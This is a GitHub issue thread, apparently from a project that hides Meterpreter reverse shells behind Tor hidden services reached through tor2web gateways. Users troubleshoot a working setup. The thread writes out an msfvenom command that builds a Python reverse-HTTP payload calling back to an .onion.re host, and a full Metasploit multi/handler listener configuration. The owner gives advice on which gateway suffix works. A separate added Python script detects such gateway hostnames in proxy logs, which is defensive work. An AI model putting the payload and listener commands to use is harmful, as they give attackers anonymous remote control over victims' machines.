This repository has been archived by the owner on Mar 11, 2023. It is now read-only.

Manual process #6

Open
analyserdmz opened this issue Aug 6, 2022 · 2 comments

Comments


analyserdmz commented Aug 6, 2022

Can you explain the manual process of your script? It seems that I am unable to connect back to the tor hidden service msfconsole, no matter what I try. Can you check the following config and verify you can connect with the same config?

  • Create a hidden service domain name with the following addition in torrc:

    HiddenServiceDir /home/kali/tor_hidden_service/
    HiddenServicePort 80 127.0.0.1:5000

  • Generate a Python stageless HTTP payload, and add ".re" at the end of LHOST (hidden service domain):

    msfvenom -f raw -p python/meterpreter_reverse_http LHOST=do5npekqive7vbeiq3g4enf4qnxmvslcybpslfe63ijodw5tbbvoqzqd.onion.re LPORT=80 > payload_not_clean.py

  • Start msfconsole with the following options:

    use exploit/multi/handler
    set payload python/meterpreter_reverse_http
    set lport 5000
    set lhost 127.0.0.1
    set exitonsession false
    set sessioncommunicationtimeout 0
    set sessionexpirationtimeout 0
    exploit -j -z

After debugging my payload with Wireshark, I can see that there is a 301 redirect to HTTPS, resulting in a "bad request".

Any suggestions?

CalfCrusher (Owner) commented Aug 10, 2022

Hello, seems all fine to me. I just tried with the .ws extension and it works. To me the .ws domains are more reliable than the others. Please pay attention also that sometimes tor2web doesn't work correctly. And also, before launching the payload, just do a simple curl to do5npekqive7vbeiq3g4enf4qnxmvslcybpslfe63ijodw5tbbvoqzqd.onion.re (or .ws) to check if all is working.

When you say "After debugging my payload with Wireshark, I can see that there is a 301 redirect to HTTPS, resulting in a "bad request"", maybe the .re extension is trying to connect to 443; just use .ws.

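As an added, defender-side example (not part of this issue or the project's code): the gateway hostnames discussed above, an onion address followed by a tor2web suffix such as .onion.re or .onion.ws, have a distinctive shape that is easy to pick out of web-proxy logs, together with the plaintext-to-HTTPS 301 the reporter saw. The log line format, client IPs and sample lines are constructed for the example; the onion address is the one quoted in the issue.

```python
import re
from collections import defaultdict

# Hostname shape of a tor2web-style gateway: a v2 (16-char) or v3 (56-char) base32
# onion label, then ".onion", then the gateway's own suffix (".re", ".ws", ...).
TOR2WEB_HOST = re.compile(r"^(?P<onion>[a-z2-7]{16}|[a-z2-7]{56})\.onion\.(?P<gateway>[a-z0-9.-]+)$", re.I)

# Constructed (hypothetical) proxy log format: "<timestamp> <client_ip> <method> <url> <status>"
LOG_LINE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) "
                      r"(?P<scheme>https?)://(?P<host>[^/:\s]+)(?::\d+)?(?P<path>/\S*)? (?P<status>\d{3})$")

# Constructed sample log; the onion address is the one quoted in the issue above.
ONION = "do5npekqive7vbeiq3g4enf4qnxmvslcybpslfe63ijodw5tbbvoqzqd"
SAMPLE_LOG = f"""\
2022-08-06T10:00:01Z 10.0.0.12 GET http://{ONION}.onion.re/abcdef 301
2022-08-06T10:00:02Z 10.0.0.12 GET https://{ONION}.onion.re/abcdef 400
2022-08-06T10:00:05Z 10.0.0.33 GET https://www.example.com/ 200
2022-08-06T10:00:09Z 10.0.0.12 GET http://{ONION}.onion.ws/abcdef 200
"""

def parse_line(line):
    """Return the fields of one log line, or None if it does not match the format."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else None

def tor2web_hits(log_text):
    """Return every parsed request whose Host is a tor2web gateway hostname."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        m = TOR2WEB_HOST.match(rec["host"]) if rec else None
        if m:
            rec["onion"] = m.group("onion").lower()
            rec["gateway"] = m.group("gateway").lower()
            hits.append(rec)
    return hits

def summarize_by_client(hits):
    """Per client: request count, onion services reached, gateways used, and whether a plaintext HTTP request was bounced to HTTPS."""
    out = defaultdict(lambda: {"count": 0, "onions": set(), "gateways": set(), "http_redirected": False})
    for h in hits:
        s = out[h["client"]]
        s["count"] += 1
        s["onions"].add(h["onion"])
        s["gateways"].add(h["gateway"])
        if h["scheme"] == "http" and h["status"] == "301":
            s["http_redirected"] = True
    return dict(out)
```

Matching on the hostname shape rather than a fixed list of gateway suffixes catches gateways that appear later, at the cost of an occasional false positive to review.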

xSunShine commented Mar 2, 2023

I am trying to do the same thing manually, but nothing passes through. When I go to the URL, it shows the Apache webserver from the listener, "it works". My question is: can I also put port 80 at the end of the hidden service line instead of 5000, for example
HiddenServicePort 80 ip:80? Will that work?
